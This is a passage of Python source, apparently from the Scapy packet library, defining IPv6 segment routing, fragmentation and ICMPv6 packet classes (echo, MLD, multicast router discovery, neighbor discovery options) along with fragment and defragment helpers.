1018 cls.registered_sr_tlv[cls.type.default] = cls
1019
1020 @classmethod
1021 def dispatch_hook(cls, pkt=None, *args, **kargs):
1022 if pkt:
1023 tmp_type = ord(pkt[:1])
1024 return cls.registered_sr_tlv.get(tmp_type, cls)
1025 return cls
1026
1027
1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1029 name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
1030 # draft-ietf-6man-segment-routing-header-06 3.1.1
1031 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1032 ByteField("len", 18),
1033 ByteField("reserved", 0),
1034 ByteField("flags", 0),
1035 IP6Field("ingress_node", "::1")]
1036
1037
1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
1039 name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1040 # draft-ietf-6man-segment-routing-header-06 3.1.2
1041 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1042 ByteField("len", 18),
1043 ByteField("reserved", 0),
1044 ByteField("flags", 0),
1045 IP6Field("egress_node", "::1")]
1046
1047
1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1049 name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1050 # RFC8754 sect 2.1.1.1
1051 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
1052 FieldLenField("len", None, length_of="padding", fmt="B"),
1053 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1054
1055
1056class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1057 name = "IPv6 Option Header Segment Routing - PadN TLV"
1058 # RFC8754 sect 2.1.1.2
1059 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1060 FieldLenField("len", None, length_of="padding", fmt="B"),
1061 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1062
1063
1064class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1065 name = "IPv6 Option Header Segment Routing - HMAC TLV"
1066 # RFC8754 sect 2.1.2
1067 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1068 FieldLenField("len", None, length_of="hmac",
1069 adjust=lambda _, x: x + 48),
1070 BitField("D", 0, 1),
1071 BitField("reserved", 0, 15),
1072 IntField("hmackeyid", 0),
1073 StrLenField("hmac", "",
1074 length_from=lambda pkt: pkt.len - 48)]
1075
1076
1077class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1078 name = "IPv6 Option Header Segment Routing"
1079 # RFC8754 sect 2. + flag bits from draft 06
1080 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1081 ByteField("len", None),
1082 ByteField("type", 4),
1083 ByteField("segleft", None),
1084 ByteField("lastentry", None),
1085 BitField("unused1", 0, 1),
1086 BitField("protected", 0, 1),
1087 BitField("oam", 0, 1),
1088 BitField("alert", 0, 1),
1089 BitField("hmac", 0, 1),
1090 BitField("unused2", 0, 3),
1091 ShortField("tag", 0),
1092 IP6ListField("addresses", ["::1"],
1093 count_from=lambda pkt: (pkt.lastentry + 1)),
1094 PacketListField("tlv_objects", [],
1095 IPv6ExtHdrSegmentRoutingTLV,
1096 length_from=lambda pkt: 8 * pkt.len - 16 * (
1097 pkt.lastentry + 1
1098 ))]
1099
1100 overload_fields = {IPv6: {"nh": 43}}
1101
1102 def post_build(self, pkt, pay):
1103
1104 if self.len is None:
1105
1106 # The extension must be align on 8 bytes
1107 tmp_mod = (-len(pkt) + 8) % 8
1108 if tmp_mod == 1:
1109 tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1110 pkt += raw(tlv)
1111 elif tmp_mod >= 2:
1112 # Add the padding extension
1113 tmp_pad = b"\x00" * (tmp_mod - 2)
1114 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1115 pkt += raw(tlv)
1116
1117 tmp_len = (len(pkt) - 8) // 8
1118 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1119
1120 if self.segleft is None:
1121 tmp_len = len(self.addresses)
1122 if tmp_len:
1123 tmp_len -= 1
1124 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1125
1126 if self.lastentry is None:
1127 lastentry = len(self.addresses)
1128 if lastentry == 0:
1129 warning(
1130 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1131 )
1132 else:
1133 lastentry -= 1
1134 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1135
1136 return _IPv6ExtHdr.post_build(self, pkt, pay)
1137
1138
1139# Fragmentation Header #
1140
1141class IPv6ExtHdrFragment(_IPv6ExtHdr):
1142 name = "IPv6 Extension Header - Fragmentation header"
1143 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1144 BitField("res1", 0, 8),
1145 BitField("offset", 0, 13),
1146 BitField("res2", 0, 2),
1147 BitField("m", 0, 1),
1148 IntField("id", None)]
1149 overload_fields = {IPv6: {"nh": 44}}
1150
1151 def guess_payload_class(self, p):
1152 if self.offset > 0:
1153 return Raw
1154 else:
1155 return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1156
1157
1158def defragment6(packets):
1159 """
1160 Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1161 Crap is dropped. What lacks is completed by 'X' characters.
1162 """
1163
1164 # Remove non fragments
1165 lst = [x for x in packets if IPv6ExtHdrFragment in x]
1166 if not lst:
1167 return []
1168
1169 id = lst[0][IPv6ExtHdrFragment].id
1170
1171 llen = len(lst)
1172 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1173 if len(lst) != llen:
1174 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
1175
1176 # reorder fragments
1177 res = []
1178 while lst:
1179 min_pos = 0
1180 min_offset = lst[0][IPv6ExtHdrFragment].offset
1181 for p in lst:
1182 cur_offset = p[IPv6ExtHdrFragment].offset
1183 if cur_offset < min_offset:
1184 min_pos = 0
1185 min_offset = cur_offset
1186 res.append(lst[min_pos])
1187 del lst[min_pos]
1188
1189 # regenerate the fragmentable part
1190 fragmentable = b""
1191 frag_hdr_len = 8
1192 for p in res:
1193 q = p[IPv6ExtHdrFragment]
1194 offset = 8 * q.offset
1195 if offset != len(fragmentable):
1196 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
1197 frag_data_len = p[IPv6].plen
1198 if frag_data_len is not None:
1199 frag_data_len -= frag_hdr_len
1200 fragmentable += b"X" * (offset - len(fragmentable))
1201 fragmentable += raw(q.payload)[:frag_data_len]
1202
1203 # Regenerate the unfragmentable part.
1204 q = res[0].copy()
1205 nh = q[IPv6ExtHdrFragment].nh
1206 q[IPv6ExtHdrFragment].underlayer.nh = nh
1207 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1208 del q[IPv6ExtHdrFragment].underlayer.payload
1209 q /= conf.raw_layer(load=fragmentable)
1210 del q.plen
1211
1212 if q[IPv6].underlayer:
1213 q[IPv6] = IPv6(raw(q[IPv6]))
1214 else:
1215 q = IPv6(raw(q))
1216 return q
1217
1218
1219def fragment6(pkt, fragSize):
1220 """
1221 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1222 expected maximum size of fragment data (MTU). The list of packets is
1223 returned.
1224
1225 If packet does not contain an IPv6ExtHdrFragment class, it is added to
1226 first IPv6 layer found. If no IPv6 layer exists packet is returned in
1227 result list unmodified.
1228 """
1229
1230 pkt = pkt.copy()
1231
1232 if IPv6ExtHdrFragment not in pkt:
1233 if IPv6 not in pkt:
1234 return [pkt]
1235
1236 layer3 = pkt[IPv6]
1237 data = layer3.payload
1238 frag = IPv6ExtHdrFragment(nh=layer3.nh)
1239
1240 layer3.remove_payload()
1241 del layer3.nh
1242 del layer3.plen
1243
1244 frag.add_payload(data)
1245 layer3.add_payload(frag)
1246
1247 # If the payload is bigger than 65535, a Jumbo payload must be used, as
1248 # an IPv6 packet can't be bigger than 65535 bytes.
1249 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1250 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
1251 return []
1252
1253 s = raw(pkt) # for instantiation to get upper layer checksum right
1254
1255 if len(s) <= fragSize:
1256 return [pkt]
1257
1258 # Fragmentable part : fake IPv6 for Fragmentable part length computation
1259 fragPart = pkt[IPv6ExtHdrFragment].payload
1260 tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1261 fragPartLen = len(tmp) - 40 # basic IPv6 header length
1262 fragPartStr = s[-fragPartLen:]
1263
1264 # Grab Next Header for use in Fragment Header
1265 nh = pkt[IPv6ExtHdrFragment].nh
1266
1267 # Keep fragment header
1268 fragHeader = pkt[IPv6ExtHdrFragment]
1269 del fragHeader.payload # detach payload
1270
1271 # Unfragmentable Part
1272 unfragPartLen = len(s) - fragPartLen - 8
1273 unfragPart = pkt
1274 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
1275
1276 # Cut the fragmentable part to fit fragSize. Inner fragments have
1277 # a length that is an integer multiple of 8 octets. last Frag MTU
1278 # can be anything below MTU
1279 lastFragSize = fragSize - unfragPartLen - 8
1280 innerFragSize = lastFragSize - (lastFragSize % 8)
1281
1282 if lastFragSize <= 0 or innerFragSize == 0:
1283 warning("Provided fragment size value is too low. " +
1284 "Should be more than %d" % (unfragPartLen + 8))
1285 return [unfragPart / fragHeader / fragPart]
1286
1287 remain = fragPartStr
1288 res = []
1289 fragOffset = 0 # offset, incremeted during creation
1290 fragId = random.randint(0, 0xffffffff) # random id ...
1291 if fragHeader.id is not None: # ... except id provided by user
1292 fragId = fragHeader.id
1293 fragHeader.m = 1
1294 fragHeader.id = fragId
1295 fragHeader.nh = nh
1296
1297 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1298 while True:
1299 if (len(remain) > lastFragSize):
1300 tmp = remain[:innerFragSize]
1301 remain = remain[innerFragSize:]
1302 fragHeader.offset = fragOffset # update offset
1303 fragOffset += (innerFragSize // 8) # compute new one
1304 if IPv6 in unfragPart:
1305 unfragPart[IPv6].plen = None
1306 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1307 res.append(tempo)
1308 else:
1309 fragHeader.offset = fragOffset # update offSet
1310 fragHeader.m = 0
1311 if IPv6 in unfragPart:
1312 unfragPart[IPv6].plen = None
1313 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1314 res.append(tempo)
1315 break
1316 return res
1317
1318
1319#############################################################################
1320#############################################################################
1321# ICMPv6* Classes #
1322#############################################################################
1323#############################################################################
1324
1325
1326icmp6typescls = {1: "ICMPv6DestUnreach",
1327 2: "ICMPv6PacketTooBig",
1328 3: "ICMPv6TimeExceeded",
1329 4: "ICMPv6ParamProblem",
1330 128: "ICMPv6EchoRequest",
1331 129: "ICMPv6EchoReply",
1332 130: "ICMPv6MLQuery", # MLDv1 or MLDv2
1333 131: "ICMPv6MLReport",
1334 132: "ICMPv6MLDone",
1335 133: "ICMPv6ND_RS",
1336 134: "ICMPv6ND_RA",
1337 135: "ICMPv6ND_NS",
1338 136: "ICMPv6ND_NA",
1339 137: "ICMPv6ND_Redirect",
1340 # 138: Do Me - RFC 2894 - Seems painful
1341 139: "ICMPv6NIQuery",
1342 140: "ICMPv6NIReply",
1343 141: "ICMPv6ND_INDSol",
1344 142: "ICMPv6ND_INDAdv",
1345 143: "ICMPv6MLReport2",
1346 144: "ICMPv6HAADRequest",
1347 145: "ICMPv6HAADReply",
1348 146: "ICMPv6MPSol",
1349 147: "ICMPv6MPAdv",
1350 # 148: Do Me - SEND related - RFC 3971
1351 # 149: Do Me - SEND related - RFC 3971
1352 151: "ICMPv6MRD_Advertisement",
1353 152: "ICMPv6MRD_Solicitation",
1354 153: "ICMPv6MRD_Termination",
1355 # 154: Do Me - FMIPv6 Messages - RFC 5568
1356 155: "ICMPv6RPL", # RFC 6550
1357 }
1358
1359icmp6typesminhdrlen = {1: 8,
1360 2: 8,
1361 3: 8,
1362 4: 8,
1363 128: 8,
1364 129: 8,
1365 130: 24,
1366 131: 24,
1367 132: 24,
1368 133: 8,
1369 134: 16,
1370 135: 24,
1371 136: 24,
1372 137: 40,
1373 # 139:
1374 # 140
1375 141: 8,
1376 142: 8,
1377 143: 8,
1378 144: 8,
1379 145: 8,
1380 146: 8,
1381 147: 8,
1382 151: 8,
1383 152: 4,
1384 153: 4,
1385 155: 4
1386 }
1387
1388icmp6types = {1: "Destination unreachable",
1389 2: "Packet too big",
1390 3: "Time exceeded",
1391 4: "Parameter problem",
1392 100: "Private Experimentation",
1393 101: "Private Experimentation",
1394 128: "Echo Request",
1395 129: "Echo Reply",
1396 130: "MLD Query",
1397 131: "MLD Report",
1398 132: "MLD Done",
1399 133: "Router Solicitation",
1400 134: "Router Advertisement",
1401 135: "Neighbor Solicitation",
1402 136: "Neighbor Advertisement",
1403 137: "Redirect Message",
1404 138: "Router Renumbering",
1405 139: "ICMP Node Information Query",
1406 140: "ICMP Node Information Response",
1407 141: "Inverse Neighbor Discovery Solicitation Message",
1408 142: "Inverse Neighbor Discovery Advertisement Message",
1409 143: "MLD Report Version 2",
1410 144: "Home Agent Address Discovery Request Message",
1411 145: "Home Agent Address Discovery Reply Message",
1412 146: "Mobile Prefix Solicitation",
1413 147: "Mobile Prefix Advertisement",
1414 148: "Certification Path Solicitation",
1415 149: "Certification Path Advertisement",
1416 151: "Multicast Router Advertisement",
1417 152: "Multicast Router Solicitation",
1418 153: "Multicast Router Termination",
1419 155: "RPL Control Message",
1420 200: "Private Experimentation",
1421 201: "Private Experimentation"}
1422
1423
1424class _ICMPv6(Packet):
1425 name = "ICMPv6 dummy class"
1426 overload_fields = {IPv6: {"nh": 58}}
1427
1428 def post_build(self, p, pay):
1429 p += pay
1430 if self.cksum is None:
1431 chksum = in6_chksum(58, self.underlayer, p)
1432 p = p[:2] + struct.pack("!H", chksum) + p[4:]
1433 return p
1434
1435 def hashret(self):
1436 return self.payload.hashret()
1437
1438 def answers(self, other):
1439 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1440 if (isinstance(self.underlayer, IPerror6) or
1441 isinstance(self.underlayer, _IPv6ExtHdr) and
1442 isinstance(other, _ICMPv6)):
1443 if not ((self.type == other.type) and
1444 (self.code == other.code)):
1445 return 0
1446 return 1
1447 return 0
1448
1449
1450class _ICMPv6Error(_ICMPv6):
1451 name = "ICMPv6 errors dummy class"
1452
1453 def guess_payload_class(self, p):
1454 return IPerror6
1455
1456
1457class ICMPv6Unknown(_ICMPv6):
1458 name = "Scapy6 ICMPv6 fallback class"
1459 fields_desc = [ByteEnumField("type", 1, icmp6types),
1460 ByteField("code", 0),
1461 XShortField("cksum", None),
1462 StrField("msgbody", "")]
1463
1464
1465# RFC 2460 #
1466
1467class ICMPv6DestUnreach(_ICMPv6Error):
1468 name = "ICMPv6 Destination Unreachable"
1469 fields_desc = [ByteEnumField("type", 1, icmp6types),
1470 ByteEnumField("code", 0, {0: "No route to destination",
1471 1: "Communication with destination administratively prohibited", # noqa: E501
1472 2: "Beyond scope of source address", # noqa: E501
1473 3: "Address unreachable",
1474 4: "Port unreachable"}),
1475 XShortField("cksum", None),
1476 ByteField("length", 0),
1477 X3BytesField("unused", 0),
1478 _ICMPExtensionPadField(),
1479 _ICMPExtensionField()]
1480 post_dissection = _ICMP_extpad_post_dissection
1481
1482
1483class ICMPv6PacketTooBig(_ICMPv6Error):
1484 name = "ICMPv6 Packet Too Big"
1485 fields_desc = [ByteEnumField("type", 2, icmp6types),
1486 ByteField("code", 0),
1487 XShortField("cksum", None),
1488 IntField("mtu", 1280)]
1489
1490
1491class ICMPv6TimeExceeded(_ICMPv6Error):
1492 name = "ICMPv6 Time Exceeded"
1493 fields_desc = [ByteEnumField("type", 3, icmp6types),
1494 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1495 1: "fragment reassembly time exceeded"}), # noqa: E501
1496 XShortField("cksum", None),
1497 ByteField("length", 0),
1498 X3BytesField("unused", 0),
1499 _ICMPExtensionPadField(),
1500 _ICMPExtensionField()]
1501 post_dissection = _ICMP_extpad_post_dissection
1502
1503
1504# The default pointer value is set to the next header field of
1505# the encapsulated IPv6 packet
1506
1507
1508class ICMPv6ParamProblem(_ICMPv6Error):
1509 name = "ICMPv6 Parameter Problem"
1510 fields_desc = [ByteEnumField("type", 4, icmp6types),
1511 ByteEnumField(
1512 "code", 0,
1513 {0: "erroneous header field encountered",
1514 1: "unrecognized Next Header type encountered",
1515 2: "unrecognized IPv6 option encountered",
1516 3: "first fragment has incomplete header chain"}),
1517 XShortField("cksum", None),
1518 IntField("ptr", 6)]
1519
1520
1521class ICMPv6EchoRequest(_ICMPv6):
1522 name = "ICMPv6 Echo Request"
1523 fields_desc = [ByteEnumField("type", 128, icmp6types),
1524 ByteField("code", 0),
1525 XShortField("cksum", None),
1526 XShortField("id", 0),
1527 XShortField("seq", 0),
1528 StrField("data", "")]
1529
1530 def mysummary(self):
1531 return self.sprintf("%name% (id: %id% seq: %seq%)")
1532
1533 def hashret(self):
1534 return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1535
1536
1537class ICMPv6EchoReply(ICMPv6EchoRequest):
1538 name = "ICMPv6 Echo Reply"
1539 type = 129
1540
1541 def answers(self, other):
1542 # We could match data content between request and reply.
1543 return (isinstance(other, ICMPv6EchoRequest) and
1544 self.id == other.id and self.seq == other.seq and
1545 self.data == other.data)
1546
1547
1548# ICMPv6 Multicast Listener Discovery (RFC2710) #
1549
1550# tous les messages MLD sont emis avec une adresse source lien-locale
1551# -> Y veiller dans le post_build si aucune n'est specifiee
1552# La valeur de Hop-Limit doit etre de 1
1553# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1554# header. (The router alert option is necessary to cause routers to
1555# examine MLD messages sent to multicast addresses in which the router
1556# itself has no interest"
1557class _ICMPv6ML(_ICMPv6):
1558 fields_desc = [ByteEnumField("type", 130, icmp6types),
1559 ByteField("code", 0),
1560 XShortField("cksum", None),
1561 ShortField("mrd", 0),
1562 ShortField("reserved", 0),
1563 IP6Field("mladdr", "::")]
1564
1565# general queries are sent to the link-scope all-nodes multicast
1566# address ff02::1, with a multicast address field of 0 and a MRD of
1567# [Query Response Interval]
1568# Default value for mladdr is set to 0 for a General Query, and
1569# overloaded by the user for a Multicast Address specific query
1570# TODO : See what we can do to automatically include a Router Alert
1571# Option in a Destination Option Header.
1572
1573
1574class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
1575 name = "MLD - Multicast Listener Query"
1576 type = 130
1577 mrd = 10000 # 10s for mrd
1578 mladdr = "::"
1579 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1580
1581
1582# TODO : See what we can do to automatically include a Router Alert
1583# Option in a Destination Option Header.
1584class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
1585 name = "MLD - Multicast Listener Report"
1586 type = 131
1587 overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1588
1589 def answers(self, query):
1590 """Check the query type"""
1591 return ICMPv6MLQuery in query
1592
1593# When a node ceases to listen to a multicast address on an interface,
1594# it SHOULD send a single Done message to the link-scope all-routers
1595# multicast address (FF02::2), carrying in its multicast address field
1596# the address to which it is ceasing to listen
1597# TODO : See what we can do to automatically include a Router Alert
1598# Option in a Destination Option Header.
1599
1600
1601class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
1602 name = "MLD - Multicast Listener Done"
1603 type = 132
1604 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1605
1606
1607# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1608
1609class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
1610 name = "MLDv2 - Multicast Listener Query"
1611 fields_desc = [ByteEnumField("type", 130, icmp6types),
1612 ByteField("code", 0),
1613 XShortField("cksum", None),
1614 ShortField("mrd", 10000),
1615 ShortField("reserved", 0),
1616 IP6Field("mladdr", "::"),
1617 BitField("Resv", 0, 4),
1618 BitField("S", 0, 1),
1619 BitField("QRV", 0, 3),
1620 ByteField("QQIC", 0),
1621 ShortField("sources_number", None),
1622 IP6ListField("sources", [],
1623 count_from=lambda pkt: pkt.sources_number)]
1624
1625 # RFC8810 - 4. Message Formats
1626 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1627
1628 def post_build(self, packet, payload):
1629 """Compute the 'sources_number' field when needed"""
1630 if self.sources_number is None:
1631 srcnum = struct.pack("!H", len(self.sources))
1632 packet = packet[:26] + srcnum + packet[28:]
1633 return _ICMPv6.post_build(self, packet, payload)
1634
1635
1636class ICMPv6MLDMultAddrRec(Packet):
1637 name = "ICMPv6 MLDv2 - Multicast Address Record"
1638 fields_desc = [ByteField("rtype", 4),
1639 FieldLenField("auxdata_len", None,
1640 length_of="auxdata",
1641 fmt="B"),
1642 FieldLenField("sources_number", None,
1643 length_of="sources",
1644 adjust=lambda p, num: num // 16),
1645 IP6Field("dst", "::"),
1646 IP6ListField("sources", [],
1647 length_from=lambda p: 16 * p.sources_number),
1648 StrLenField("auxdata", "",
1649 length_from=lambda p: p.auxdata_len)]
1650
1651 def default_payload_class(self, packet):
1652 """Multicast Address Record followed by another one"""
1653 return self.__class__
1654
1655
1656class ICMPv6MLReport2(_ICMPv6): # RFC 3810
1657 name = "MLDv2 - Multicast Listener Report"
1658 fields_desc = [ByteEnumField("type", 143, icmp6types),
1659 ByteField("res", 0),
1660 XShortField("cksum", None),
1661 ShortField("reserved", 0),
1662 ShortField("records_number", None),
1663 PacketListField("records", [],
1664 ICMPv6MLDMultAddrRec,
1665 count_from=lambda p: p.records_number)]
1666
1667 # RFC8810 - 4. Message Formats
1668 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1669
1670 def post_build(self, packet, payload):
1671 """Compute the 'records_number' field when needed"""
1672 if self.records_number is None:
1673 recnum = struct.pack("!H", len(self.records))
1674 packet = packet[:6] + recnum + packet[8:]
1675 return _ICMPv6.post_build(self, packet, payload)
1676
1677 def answers(self, query):
1678 """Check the query type"""
1679 return isinstance(query, ICMPv6MLQuery2)
1680
1681
1682# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1683
1684# TODO:
1685# - 04/09/06 troglocan : find a way to automatically add a router alert
1686# option for all MRD packets. This could be done in a specific
1687# way when IPv6 is the under layer with some specific keyword
1688# like 'exthdr'. This would allow to keep compatibility with
1689# providing IPv6 fields to be overloaded in fields_desc.
1690#
1691# At the moment, if user inserts an IPv6 Router alert option
1692# none of the IPv6 default values of IPv6 layer will be set.
1693
1694class ICMPv6MRD_Advertisement(_ICMPv6):
1695 name = "ICMPv6 Multicast Router Discovery Advertisement"
1696 fields_desc = [ByteEnumField("type", 151, icmp6types),
1697 ByteField("advinter", 20),
1698 XShortField("cksum", None),
1699 ShortField("queryint", 0),
1700 ShortField("robustness", 0)]
1701 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1702 # IPv6 Router Alert requires manual inclusion
1703
1704 def extract_padding(self, s):
1705 return s[:8], s[8:]
1706
1707
1708class ICMPv6MRD_Solicitation(_ICMPv6):
1709 name = "ICMPv6 Multicast Router Discovery Solicitation"
1710 fields_desc = [ByteEnumField("type", 152, icmp6types),
1711 ByteField("res", 0),
1712 XShortField("cksum", None)]
1713 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1714 # IPv6 Router Alert requires manual inclusion
1715
1716 def extract_padding(self, s):
1717 return s[:4], s[4:]
1718
1719
1720class ICMPv6MRD_Termination(_ICMPv6):
1721 name = "ICMPv6 Multicast Router Discovery Termination"
1722 fields_desc = [ByteEnumField("type", 153, icmp6types),
1723 ByteField("res", 0),
1724 XShortField("cksum", None)]
1725 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1726 # IPv6 Router Alert requires manual inclusion
1727
1728 def extract_padding(self, s):
1729 return s[:4], s[4:]
1730
1731
1732# ICMPv6 Neighbor Discovery (RFC 2461) #
1733
1734icmp6ndopts = {1: "Source Link-Layer Address",
1735 2: "Target Link-Layer Address",
1736 3: "Prefix Information",
1737 4: "Redirected Header",
1738 5: "MTU",
1739 6: "NBMA Shortcut Limit Option", # RFC2491
1740 7: "Advertisement Interval Option",
1741 8: "Home Agent Information Option",
1742 9: "Source Address List",
1743 10: "Target Address List",
1744 11: "CGA Option", # RFC 3971
1745 12: "RSA Signature Option", # RFC 3971
1746 13: "Timestamp Option", # RFC 3971
1747 14: "Nonce option", # RFC 3971
1748 15: "Trust Anchor Option", # RFC 3971
1749 16: "Certificate Option", # RFC 3971
1750 17: "IP Address Option", # RFC 4068
1751 18: "New Router Prefix Information Option", # RFC 4068
1752 19: "Link-layer Address Option", # RFC 4068
1753 20: "Neighbor Advertisement Acknowledgement Option",
1754 21: "CARD Request Option", # RFC 4065/4066/4067
1755 22: "CARD Reply Option", # RFC 4065/4066/4067
1756 23: "MAP Option", # RFC 4140
1757 24: "Route Information Option", # RFC 4191
1758 25: "Recursive DNS Server Option",
1759 26: "IPv6 Router Advertisement Flags Option"
1760 }
1761
1762icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1763 2: "ICMPv6NDOptDstLLAddr",
1764 3: "ICMPv6NDOptPrefixInfo",
1765 4: "ICMPv6NDOptRedirectedHdr",
1766 5: "ICMPv6NDOptMTU",
1767 6: "ICMPv6NDOptShortcutLimit",
1768 7: "ICMPv6NDOptAdvInterval",
1769 8: "ICMPv6NDOptHAInfo",
1770 9: "ICMPv6NDOptSrcAddrList",
1771 10: "ICMPv6NDOptTgtAddrList",
1772 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1773 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1774 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1775 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1776 # 15: Do Me,
1777 # 16: Do Me,
1778 17: "ICMPv6NDOptIPAddr",
1779 18: "ICMPv6NDOptNewRtrPrefix",
1780 19: "ICMPv6NDOptLLA",
1781 # 18: Do Me,
1782 # 19: Do Me,
1783 # 20: Do Me,
1784 # 21: Do Me,
1785 # 22: Do Me,
1786 23: "ICMPv6NDOptMAP",
1787 24: "ICMPv6NDOptRouteInfo",
1788 25: "ICMPv6NDOptRDNSS",
1789 26: "ICMPv6NDOptEFA",
1790 31: "ICMPv6NDOptDNSSL",
1791 37: "ICMPv6NDOptCaptivePortal",
1792 38: "ICMPv6NDOptPREF64",
1793 }
1794
1795icmp6ndraprefs = {0: "Medium (default)",
1796 1: "High",
1797 2: "Reserved",
1798 3: "Low"} # RFC 4191
1799
1800
1801class _ICMPv6NDGuessPayload:
1802 name = "Dummy ND class that implements guess_payload_class()"
1803
1804 def guess_payload_class(self, p):
1805 if len(p) > 1:
1806 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1807
1808
1809# Beginning of ICMPv6 Neighbor Discovery Options.
1810
1811class ICMPv6NDOptDataField(StrLenField):
1812 __slots__ = ["strip_zeros"]
1813
1814 def __init__(self, name, default, strip_zeros=False, **kwargs):
1815 super().__init__(name, default, **kwargs)
1816 self.strip_zeros = strip_zeros
1817
1818 def i2len(self, pkt, x):
1819 return len(self.i2m(pkt, x))
1820
1821 def i2m(self, pkt, x):
1822 r = (len(x) + 2) % 8
1823 if r:
1824 x += b"\x00" * (8 - r)
1825 return x
1826
1827 def m2i(self, pkt, x):
1828 if self.strip_zeros:
1829 x = x.rstrip(b"\x00")
1830 return x
1831
1832
1833class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1834 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1835 fields_desc = [ByteField("type", 0),
1836 FieldLenField("len", None, length_of="data", fmt="B",
1837 adjust=lambda pkt, x: (2 + x) // 8),
1838 ICMPv6NDOptDataField("data", "", strip_zeros=False,
1839 length_from=lambda pkt:
1840 8 * max(pkt.len, 1) - 2)]
1841
1842# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1843# TODO: Revoir le coup du ETHER_ANY
1844
1845
1846class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1847 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1848 fields_desc = [ByteField("type", 1),
1849 ByteField("len", 1),
1850 SourceMACField("lladdr")]
1851
1852 def mysummary(self):
1853 return self.sprintf("%name% %lladdr%")
1854
1855
1856class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1857 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1858 type = 2
1859
1860
1861class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1862 name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1863 fields_desc = [ByteField("type", 3),
1864 ByteField("len", 4),
1865 ByteField("prefixlen", 64),
1866 BitField("L", 1, 1),
1867 BitField("A", 1, 1),
1868 BitField("R", 0, 1),
1869 BitField("res1", 0, 5),
1870 XIntField("validlifetime", 0xffffffff),
1871 XIntField("preferredlifetime", 0xffffffff),
1872 XIntField("res2", 0x00000000),
1873 IP6Field("prefix", "::")]
1874
1875 def mysummary(self):
1876 return self.sprintf("%name% %prefix%/%prefixlen% "
1877 "On-link %L% Autonomous Address %A% "
1878 "Router Address %R%")
1879
1880# TODO: We should also limit the size of included packet to something
1881# like (initiallen - 40 - 2)
